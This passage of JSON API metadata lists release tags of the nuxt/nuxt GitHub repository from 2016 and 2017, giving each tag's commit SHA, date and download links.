/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r